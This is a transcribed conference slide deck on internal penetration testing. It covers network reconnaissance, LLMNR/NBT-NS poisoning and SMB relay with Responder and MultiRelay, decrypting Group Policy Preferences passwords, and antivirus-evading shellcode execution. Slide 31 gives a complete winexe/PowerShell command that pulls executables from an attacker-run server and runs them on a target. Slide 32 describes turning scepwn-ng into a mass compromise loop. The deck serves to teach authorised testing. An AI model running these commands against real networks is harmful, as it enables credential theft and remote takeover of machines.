Internal Pentest: from z3r0 to h3r0

50 %
50 %
Information about Internal Pentest: from z3r0 to h3r0

Published on November 23, 2016

Author: marcioalma

Source: slideshare.net

1. O MAIOR FESTIVAL HACKER DA AMÉRICA LATINA

2. Internal Pentest From z3r0 to h3r0 by Márcio "pimps" Almeida

3. Internal Pentest From z3r0 to h3r0 – Márcio Almeida * Disclaimer * • Slides in english but I’ll speak in Portuguese. • That presentation don’t have any tool created or invented by me, only how I use "well known" tools and how I can automatize their use... • On this presentation I’ll only talk about ideas and tricks that I personally use during Internal penetration test engagements. 3

4. Internal Pentest From z3r0 to h3r0 – Márcio Almeida whoami • a.k.a Pimps • CTF Player (web and crypto) • Proud Member of TheGoonies CTF Team • Check our writeups at: https://thegoonies.rocks • Penetration Tester (+7 years) • Tempest, Cipher, SpiderLabs and Securus Global • Previous Presentations • Black Hat SP, BSides LV, Ekoparty, Thotcon, AlligatorCon, YSTS… 22/11/16 4

5. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Scenario we will talk about • Internal Penetration Testing • 100% Black Box (Plug and Play) • Time constriction (3-5 days) • Without “low-hanging fruits” • Anti-virus and some other protections in place 22/11/16 5

6. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Agenda • Unfortunately we have only 40m so I choose: • Reconnaissance Tricks on Blackbox Testing • LLMNR and NBT-NS Poisoning • GPOs / GPPs • Shellcode Execution - SCE 6

7. Internal Pentest From z3r0 to h3r0 – Márcio Almeida RECONNAISSANCE TRICKS ON BLACKBOX TESTING 7

8. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Domain Computer Accounts • First enumerate all Domain Controllers: • nslookup • ping domain_name • dsquery • Etc… • Use enum4linux to enumerate all users on the domain (if null session is enabled or using a cred). • Extract all machine usernames (accounts with $ on the username, like: user$) • Nmap all those userX$.domain_name to get their IP addresses and open ports. Repeat the nmap process in all different subnets. 22/11/16 8

9. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Identifying “Live Subnets” • You don’t need scan all IPs to identify live subnets… • Scan well known IP address with well known ports to identify live addresses in subnets: • x.x.x.1, x.x.x.101, x.x.x.192, x.x.x.201, x.x.x.253, x.x.x.254 • Scan common ports: 21, 22, 23, 25, 53, 80, 443, 445, 3389 22/11/16 9

10. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Identifying “Live Hosts” • Once you find a subnet with a live IP, then scan the whole subnet with a tuned nmap command: • nmap -A -T4 -n -top-ports 1000 -- max-rtt-timeout=500ms --initial-rtt- timeout=200ms --min-rtt- timeout=200ms --open --stats-every 5s x.x.x.0/24 22/11/16 10

11. Internal Pentest From z3r0 to h3r0 – Márcio Almeida LLMNR AND NBT-NS POISONING 11

12. Internal Pentest From z3r0 to h3r0 – Márcio Almeida LLMNR and NBT-NS Poisoning • The victim machine wants to go to print server at printserver, but mistakenly types in pintserver. • The DNS server responds to the victim saying that it doesn’t know that host. • The victim then asks if there is anyone on the local network that knows the location of pintserver • The attacker responds to the victim saying that he actually is the pintserver • The victim believes the attacker and sends its own username and NTMLv2 hash to the attacker. • The attacker can now crack the hash to discover the password 12

13. Internal Pentest From z3r0 to h3r0 – Márcio Almeida LLMNR and NBT-NS Poisoning 13

14. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder by @lgandx https://github.com/lgandx/Responder • Performs LLMNR/NBT-NS/mDNS poisoning in a easy and highly effective way and stores the captured hashes and clear-text credentials into files. • Pre-requisites: Install Python • git clone https://github.com/lgandx/Responder.git • cd Responder • ./Responder.py -I eth0 –rPv • Use john or hashcat to crack the captured NTMLv2 hashes via dictionary attack… If you don’t have a good wordlist you can use the rockyou.txt. Works well to me in most ocasions... 14

15. Internal Pentest From z3r0 to h3r0 – Márcio Almeida DEMO Responder by @lgandx https://www.youtube.com/watch?v=mgAHX4h1ojI 15

16. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder + Proxenet by @hugsy https://proxenet.readthedocs.io/en/dev/mitm/ • Use Responder to spoof NetBIOS packets and poison local network Windows workstation WPAD configuration, and redirect traffic to our evil box. • Add the plugin oPhishPoison.py to the autoload directory of proxenet and start it. • ln -sf proxenet-plugins/oPhishPoison.py proxenet- plugins/autoload/oPhishPoison.py • ./proxenet -b YOUR_IP -p 8008 -i –N • From the moment proxenet and Responder are configured and running, fake LLMNR and WPAD responses will be sent to the victims. By default, the loaded plugin will replace known binary content types (such as Office documents, ZIP files, RAR archives, etc.) with PE executables containing your payloads. • Please visit the link for detailed configuration. 16

17. Internal Pentest From z3r0 to h3r0 – Márcio Almeida DEMO Responder + Proxenet by @hugsy https://www.youtube.com/watch?v=eN_HwFkyYyw 17

18. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Quick Overview: SMBRelay 18

19. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder + MultiRelay http://g-laurent.blogspot.com.br/2016/10/introducing-responder-multirelay-10.html • MultiRelay was built to work in conjunction with Responder.py, the common usage scenario is: • Set SMB and HTTP to Off in Responder.conf • ./Responder.py -I eth0 -rv (on one screen) • ./tools/MultiRelay.py -t Target_IP -u Administrator/Daaccount/OtherAdmin/ALL (on another screen). 19

20. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder + MultiRelay http://g-laurent.blogspot.com.br/2016/10/introducing-responder-multirelay-10.html • Once a relay has been successful, MultiRelay will give you an interactive shell allowing you to: • Remotely dump the LM and NT hashes on the target (that you can pass-the-hash after) • Remotely dump any registry keys under HKLM (sensitive information and configurations) • Read any file on the target. • Download any file on the target. • Execute any command as System on the target. 20

21. Internal Pentest From z3r0 to h3r0 – Márcio Almeida MultiRelay DEMO by @lgandx https://www.youtube.com/watch?v=c5GT9pAtnIw 21

22. Internal Pentest From z3r0 to h3r0 – Márcio Almeida GPO – GROUP POLICY OBJECT GPP – GROUP POLICY PROPERTIES 22

23. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Group Policies (GPO) • SYSVOL is a share present on the Domain Controllers to which all authenticated users have read access. • SYSVOL contains logon scripts, group policy data, and other domain-wide data which needs to be available anywhere. • All domain Group Policies are stored here: • <DOMAIN_CONTROLLER>SYSVOL<DOMAIN_NAME>Policies 23

24. Internal Pentest From z3r0 to h3r0 – Márcio Almeida 24 Clear-text Credentials on SYSVOL

25. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Group Policy Preferences (GPP) • In 2006, Microsoft Bought Desktop Standard’s “PolicyMaker” which they re-branded & released with Windows Server 2008 as “Group Policy Preferences.” • One of the most useful features of Group Policy Preferences (GPP) is the ability to store and use credentials in several scenarios (change local admin password, configure prints, configure shares, configure services, etc). • Those credentials are stored Encrypted. They are encrypted with AES-256 which should be good enough… But… 25

26. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Thanks Microsoft ;-* 26 https://msdn.microsoft.com/en-us/library/cc422924.aspx

27. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Decrypting GPP cpassword 27 https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1 root@kali:~# gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw Local*P4ssword!

28. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Metasploit Module GPP 28

29. Internal Pentest From z3r0 to h3r0 – Márcio Almeida SHELLCODE EXECUTION - SCE 29

30. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Shellcode Execution - SCE • HIGHLY EFFECTIVE for anti-virus bypass • My own experience: worked perfectly 100% of the times that I needed use. • Works beautifully using winexe or psexec (God bless the Pass the Hash :-P) • Using a Domain Admin account is possible automatize the Mass p0wn4g3 on the network “scripting” the command reading the targets from a list. • Using a Meterpreter script you can also automatize the capture of evidences on all compromised machines (screenshot, ifconfig, hashdump, mimikatz, getinfo, etc…) 30

31. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Shellcode Execution - SCE • Using Microsoft PowerShell is possible download the binary (wget like style) to a temporary directory, execute it and erase the file after: • On Attacker machine execute: python –m SimpleHTTPServer • Will enable http://YOUR_MACHINE:8000/ on Attacker machine • winexe --user=DOMAIN/USER%HASH_OR_PASSWORD //TARGET "cmd /c "del teste.bat & echo powershell -c "(new- object System.Net.WebClient).DownloadFile('http://YOUR_MACHINE :8000/sce.32.exe','sce.32.exe')" >> teste.bat & echo powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOUR_MACHINE :8000/hack.bat','hack.bat')" >> teste.bat & echo hack.bat >> teste.bat & teste.bat"" 31

32. Internal Pentest From z3r0 to h3r0 – Márcio Almeida SCEPWN-NG by @joshuaskorich https://github.com/joshuaskorich/scepwn-ng • Using a samba share you can execute the binary directly from the sharing folder injecting the meterpreter session directly on memory without any file ever touch the disk! • Details of how configure the environment on scepwn-ng github. • After configure your environment, and get a privileged account, just execute: • ./scepwn-ng.rb -u 'username%password_or_hash' -t TARGET • If you put this command in a loop to read from a list of targets and use a Meterpreter script to automatize commands on targets, it becomes a mass auto-pwn tool. 32

33. Obrigado! Twitter: @marcioalm Email: marcioalma@gmail.com #dontstophacking

Add a comment